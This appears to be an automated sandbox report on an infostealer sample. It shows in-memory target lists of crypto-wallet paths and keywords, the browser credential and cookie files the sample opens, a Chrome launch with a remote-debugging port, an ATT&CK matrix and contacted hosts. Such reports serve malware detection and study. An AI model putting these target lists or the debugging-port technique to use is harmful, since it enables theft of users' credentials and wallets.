                Source: Procedures.com, 0000000B.00000002.3157816062.000000000408D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000415C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: eam\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000415C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: eam\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000408D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Exodus\
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Binance\
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                Source: Procedures.com, Binary or memory string: WIN_81
                Source: Procedures.com, Binary or memory string: WIN_XP
                Source: Procedures.com, Binary or memory string: WIN_XPe
                Source: Procedures.com, Binary or memory string: WIN_VISTA
                Source: Procedures.com, Binary or memory string: WIN_7
                Source: Procedures.com, Binary or memory string: WIN_8
                Source: Yara match, File source: 0000000B.00000002.3152315599.000000000141D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: Procedures.com PID: 1576, type: MEMORYSTR

                Remote Access Functionality

                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: Yara match, File source: sslproxydump.pcap, type: PCAP
                Source: Yara match, File source: 11.2.Procedures.com.3fb0000.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0000000B.00000003.2364490676.0000000003FB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000B.00000003.2364595712.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000B.00000003.2364186643.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000B.00000002.3157816062.0000000003FB1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000B.00000003.2364080745.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000B.00000002.3156069871.0000000003CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000B.00000003.2364772112.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000B.00000002.3152315599.000000000141D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: Procedures.com PID: 1576, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com, Code function: 11_2_00EA2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00EA2263
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com, Code function: 11_2_00EA1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,11_2_00EA1C61
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | 1 Native API | 2 Valid Accounts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Extra Window Memory Injection | 2 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 21 Input Capture | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 1 DLL Side-Loading | NTDS | 27 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 Extra Window Memory Injection | LSA Secrets | 1 Query Registry | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 12 Process Injection | 111 Masquerading | Cached Domain Credentials | 121 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Registry Run Keys / Startup Folder | 2 Valid Accounts | DCSync | 1 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Virtualization/Sandbox Evasion | Proc Filesystem | 4 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                [Behavior graph (image not reproduced). Behavior Graph ID: 1579620, Sample: trZG6pItZj.exe, Startdate: 23/12/2024, Architecture: WINDOWS, Score: 100]

                Source | Detection | Scanner | Label | Link
                trZG6pItZj.exe | 18% | ReversingLabs | |
                trZG6pItZj.exe | 27% | Virustotal | | Browse

                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Local\Temp\139308\Procedures.com | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\Lp | 0% | ReversingLabs | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                chrome.cloudflare-dns.com | 172.64.41.3 | true | false | | high
                toptek.sbs | 94.130.188.57 | true | false | | high
                t.me | 149.154.167.99 | true | false | | high
                ssl.bingadsedgeextension-prod-europe.azurewebsites.net | 94.245.104.56 | true | false | | high
                sb.scorecardresearch.com | 18.165.220.110 | true | false | | high
                www.google.com | 142.250.181.132 | true | false | | high
                googlehosted.l.googleusercontent.com | 142.250.181.65 | true | false | | high
                clients2.googleusercontent.com | unknown | unknown | false | | high
                bzib.nelreports.net | unknown | unknown | false | | high
                assets.msn.com | unknown | unknown | false | | high
                c.msn.com | unknown | unknown | false | | high
                ntp.msn.com | unknown | unknown | false | | high
                ZWVyoKcTcBhhzV.ZWVyoKcTcBhhzV | unknown | unknown | false | | unknown
                api.msn.com | unknown | unknown | false | | high
                Name | Malicious | Antivirus Detection | Reputation
                https://sb.scorecardresearch.com/b?rn=1734931474877&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2DB99B69D85C6DF817C28E37D9F46CAD&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null | false | | high
                https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734931481529&w=0&anoncknm=app_anon&NoResponseBody=true | false | | high
                                                                                                                                        high
                                                                                                                                        https://anglebug.com/7369chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://anglebug.com/7489chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://docs.google.com/presentation/chrome.exe, 0000000F.00000003.2579210853.0000327000F8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://chrome.google.com/webstorechrome.exe, 0000000F.00000003.2550296822.0000327000E88000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2693271301.000074D00238C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000002.2856151475.000028280236C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://cdnjs.cloudflare.com/ajax/libs/mathjax/offscreendocument_main.js.24.dr, service_worker_bin_prod.js.24.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://drive-daily-2.corp.google.com/manifest.json0.24.drfalse
                                                                                                                                                    high
                                                                                                                                                    http://polymer.github.io/PATENTS.txtchrome.exe, 0000000F.00000003.2549261296.00003270006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549336556.0000327000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547178754.0000327000F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549667982.00003270003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547226137.0000327001080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550158858.000032700120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549179677.0000327000C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547038722.0000327000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550016717.00003270010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547154386.00003270010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549286147.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547114181.0000327001064000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Procedures.com, 0000000B.00000002.3156448744.0000000003ED7000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3152315599.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, Web Data.24.dr, P8Q1VA.11.dr, DJWL6P.11.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://t.me/k04aelm0nk3Mozilla/5.0Procedures.com, 0000000B.00000003.2364772112.00000000014E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://www.autoitscript.com/autoit3/XProcedures.com, 0000000B.00000000.2113380186.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp, Night.0.dr, Procedures.com.2.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://issuetracker.google.com/161903006msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.ecosia.org/newtab/Procedures.com, 0000000B.00000002.3152315599.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, P8Q1VA.11.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://drive-daily-1.corp.google.com/manifest.json0.24.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://excel.new?from=EdgeM365Shoreline5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://drive-daily-5.corp.google.com/manifest.json0.24.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://docs.google.com/spreadsheets/chrome.exe, 0000000F.00000003.2590558678.0000327000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577547172.0000327000BD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://anglebug.com/3078chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://anglebug.com/7553chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
